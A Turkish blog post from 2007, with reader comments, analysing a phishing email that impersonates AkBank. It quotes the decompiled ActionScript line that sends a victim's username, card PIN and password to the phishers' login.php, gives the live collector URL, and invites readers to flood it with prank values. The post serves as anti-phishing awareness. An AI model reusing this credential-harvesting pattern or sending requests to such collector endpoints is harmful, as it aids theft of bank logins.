DMRY.NET’e Hoşgeldiniz
Nerdeyim? GirişInternet › Sahte AkBank uyarı e-Postasına dikkat

Sahte AkBank uyarı e-Postasına dikkat

Az önce elime bir e-posta geçti. AkBank adına Interaktif Bankacilik Hesabiniz konusu ile yollanmıştı. O an şüphelendim zaten, çünkü AkBank ile çalışmıyorum :) E-posta’nın içeriğinde, AkBank hesabımın online bankacılık hizmet süresinin dolmak üzere olduğunun ve altta sunulan bağlantı üzerinden hesabıma erişerek, aktivasyon işlemimi tekrar gerçekleştirebileceğim yazıyordu.


Sahte E-Posta

Üstteki resimde, bana gelen e-postayı birebir görüyorsunuz.

Peki sahte olduğunu nasıl anlayacaksınız?

  1. Eğer benim gibi bu banka ile çalışmıyorsanız, e-posta zaten sahtedir.. Siliniz gitsin.
  2. E-posta AkBank adına acc@akbank.com.tr adresinden yollanmış olsa dahi, e-posta içerisindeki bağlantılar Akbank’ın resmi sitesine çıkmıyorsa, e-posta sahtedir.
  3. Üsttekini ispatlayalım. E-posta içerisindeki https://ticinternetsube.akbank.com.tr bağlantısına tıklayalım. Akbank Kurumsal İnternet Şubesi yerine, Akbank’ın giriş sayfasının kopyalandığını şuradaki adrese çıkıyoruz. Bu esnada uyanmanız gerekiyor. Çünkü web sayfasının adresi akbank.com.tr değil, omnilife.de/images/login olarak devam ediyor.

İstenine uygularsanız ne olur?

Sahte e-postada istenilen gibi müşteri bilgilerinizi girerseniz, Akbank hesabınıza ait online bankacılık bilgileriniz başka ellere gider.
Sahte URL üstünden 1111111111 müşteri numarası ile giriş yapıyorum. İşin komik kısmı, giriş formunun koca bir ok ile belirtilmesi :)

Sahte URL

Müşteri kodumu giriyorum ve yeni bir pencere içerisinde online bankacılığa giriş sayfası açılıyor. Buraya kadar herşey çok güzel hazırlanmış değil mi? Fakat sizler buraya gelmeden e-postanın sahte olduğunu, az önce yukarıda belirttiğimiz maddeler ile anlamış oldunuz. Şu an amacımız, tecrübeli olmayan internet kullanıcıların bilinçlenmesi adına sahte kullanımı sonuna kadar görüntülemek.

Yeni pencerede açılan ve asıl önemli bilgileri isteyen forma geldik. Buradaki oturum açma formu Flash ile hazırlanmış ve önemli bilgiler bu dosya üzerinden gönderiliyor olmalı. Bahsi geçen sahte Flash oturum açma dosyası ise buradaki adreste yer alıyor. Bu flash dosyasını bilgisayarıma indiriyorum ve Sothink SWF Decompiler ya da benzeri bir yazılım ile açıyorum.

Flash dosyasının içerisinde yer alan ActionScript satırlarına incelemeye başlıyorum. Ve kısa bir süre sonra görmek istediğim satıra ulaşıyorum.

[AS]tmpstr = “login.php?a1=” + USERNAME + “&a2=” + CARDPIN + “&a3=” + PAROLANIZ + “”;[/AS]

Bu satır; müşterinin kullanıcı adı, banka kartı şifresi ve parolasının yollandığı yer oluyor. Yani siz bu bilgileri girdiğinizde, login.php adresine bunlar yollanacak ve büyük ihtimalle bu bilgilerin her biri, bir veritabanında derlenecek ya da ikinci kişilerin e-postasına yollanacak. Ve kısa bir süre sonrasında banka hesabımızda değişiklikler olmaya başlayacak :)

İşin şaka kısmı

İşin şaka kısmı ile devam edelim öyleyse. Ne demiştik hatırlayalım öncelikle. Tüm banka bilgilerimiz sahte URL üstündeki login.php dosyasına yollanıyordu. Tabi bu bilgiler AkBank sunucularından kontrol ettirilmediği için, içeriği ne olursa olsun ikinci kişilere gidecektir. O zaman biz de bu kişilere güzel bir mesaj yollayabiliriz o form aracılığı ile.

http://omnilife.de/images/login/login.php?a1=Müşteri adım&a2=kart şifrem&a3=parolam

Üstteki satırlar, önemli bilgilerin gönderildiği dosyaya çıkıyor ve buradaki a1, a2 ve a3 alanları istediğiniz metinler ile doldurduktan sonra URL adresini kopyalayarak, tarayıcıya yapıştırıp, sayfayı çağırabilirsiniz. Ne yazarsanız yazın, buradaki adrese yönlendirilerek alttaki gibi işlem başarılı mesajını alacaksınız :)

Sahte URL 2

Bu yazı 15 Nisan 2007, 14:01 tarihinde yazılmış olup bu zamana kadar 3,160 kez görüntülenmiştir

Bu yazı 16 adet yorum almıştır ve bunların son 10 adeti görüntülenmektedir. Bu yazıya yapılan tüm yorumları görmek için arşivi görüntüleyiniz. TÜM YORUMLARI OKUMAK İÇİN TIKLAYINIZ.

#16 – 16 Mart 2009 , 15:12

murat

yaw arkadaşlar bana da geldi ama ben linke tıkladım ama hiçbir bilgi girmedim yani sayfa açılmadı kaldıki benim kartım bile yok ama :D tehlikeye girmişmiyimdir yaw sizce tıklayarak sadece! :-o

  • Yorumlar: 1
  • İlk Yorum:
    16 Mar. 2009
#15 – 02 Ağustos 2007 , 20:08

taner

Mail adresime gelen maili aynen ilettim Akbank’a… Müşterilerini haberdar etsinler diye. Ama onlar bana böyle şeylere inanmamamı ve adres çubuğuna akbank.com.tr yazarak banka sitesine girmemi tavsiye ettiler. Oysa ki benim Akbankta hesabım bile yok.. O kadar ciddiler ki olayı anlayamıyorlar.. :)

  • Yorumlar: 6
  • İlk Yorum:
    01 Kas. 2006
#14 – 30 Haziran 2007 , 20:45

youtube

wallaha arkadaşın başına geldi.3000 ytl parası gitti gerçekten milletin ekmeğiyle oynuyorlar ama akbank da önlemini almış diğer bankalar gibi

  • Yorumlar: 8
  • İlk Yorum:
    30 Haz. 2007
#13 – 24 Mayıs 2007 , 08:58

Nuriye Atılkan

Aynı Mail banada geldi Nüfus Cüzdanımı 20 gün önce kaybettiğim için terettüt içerisinde kaldım ve AKBANK’ı aradım . Müşter,ilişkileri böyle bir mail göndermiyoruz dolandırıcılık çetesinin tuzagıdır Bilgisini verdi Akbank’la hiçbir iletişimim olmadığı halde belki de borç batağına sürüklenebilirdim.Allah belalarını versin etrafımızda insan statüsüne uymayan okadar mahluklar varki artık ne yapacaklarını şaşırmışlar Rabbim böyle insanların şerrinden korusun o kadar günahsız insanın kanını emiyorlar bu dünyanın birde öteki tarafını hiçmi hiç düşünmüyorlar. Cehennem ateşi içlerine düştüğü zaman anlarlar ama iş işten geçmiş binlerce ocak çoktan sönmüş olur o zamana kadar allah islah etsin başka ne diyebilirim ki.

Herkes çok dikkat etsin böyle olaylar önemsenmemeye gelmez parmaklarımızın ucuyla hayatımızı kararta biliriz.

Herkese Mutlu huzurlu günler dilerim.

  • Yorumlar: 1
  • İlk Yorum:
    24 May. 2007
#12 – 18 Mayıs 2007 , 23:38

ümit

sahtekarlar milletin üstünden para kazanmaya çalışanlarr ayıp ayıp ğidinde çalışın :lol:

  • Yorumlar: 1
  • İlk Yorum:
    18 May. 2007
#11 – 09 Mayıs 2007 , 15:19

Hazar

Bu tür phishing saldırılarına dikkat etmek lazım. Bir de başımıza Türkçe karakterli domainler çıktı, mesela garanti.com yerine GARANTİ.com yazarsanız farklı adres oluyor. Bu şekilde phishing saldırıları da ileride yaygınlaşabilir, netekim bilinen tüm kaliteli domainlerin Türkçe karakterli varyasyonları alınmaya başlandı, Google’da arayınca international harfler İngilizce karşılıklarıyla aranıyormuş, ee, bu yüzden nescafé.com = nescafe.com Nescafe’i satın almış oldunuz güle güle kullanın.

E-postalardaki linklere tıklamayın. Akbanktan mı mail geldi, adres satırınıza akbank.com.tr yazın öyle girin. Tıklamak hayırlı değil! Doğru adrese girdiğinizden emin olmak her zaman bu kadar kolay olmayabilir, çok çok şaşırtıcı bir şekilde orjinaline benzeyenleri de gördüm, burada eleman ok koymuş gerçi :mrgreen: ona bayıldım. şifrenizi buraya yazacaksınız oku :|

  • Yorumlar: 6
  • İlk Yorum:
    10 Şub. 2007
#10 – 26 Nisan 2007 , 14:15

evrena

Şu sıralar benzer sahtekarlık Yapı Kredi Bankası üzerinden dönüyor, aman dikkat.

  • Yorumlar: 4
  • İlk Yorum:
    26 Nis. 2007
#9 – 21 Nisan 2007 , 11:33

veysi

Uyarın için çok teşekkür ederim dmRy, bu aralar bana da sık gelmeye başladı

  • Yorumlar: 3
  • İlk Yorum:
    06 Oca. 2007
#8 – 16 Nisan 2007 , 19:05

Hakan

Aynı mail banada geldi. Ben Akbank kullanıcısı olduğum için maili dikkate aldım fakat benim kartım online işlemlere kapalı olduğundan bir üçkağıt olduğunu sezdim.

  • Yorumlar: 2
  • İlk Yorum:
    16 Nis. 2007
#7 – 15 Nisan 2007 , 18:49

Cem

Akbank’ın yanı sıra “Yapi Kredi İnteraktif Bankacilik”te bol bol geliyor. :)

  • Yorumlar: 38
  • İlk Yorum:
    05 Ağu. 2006
YAZIYI BEĞENDİN Mİ?

Yazını çok beğendim. Yeni yazılarının e-posta adresime gelmesini istiyorum :)

Haberler RSS Yorumlar RSS

Önerdiğim Adresler

© 2009 Tüm hakları dmRy.net'e aittir.
Kullanım şartları yerine getirilmeden hiçbir şekilde kopyala-yapıştır yapılamaz, yazılar ve bilgiler kullanılamaz.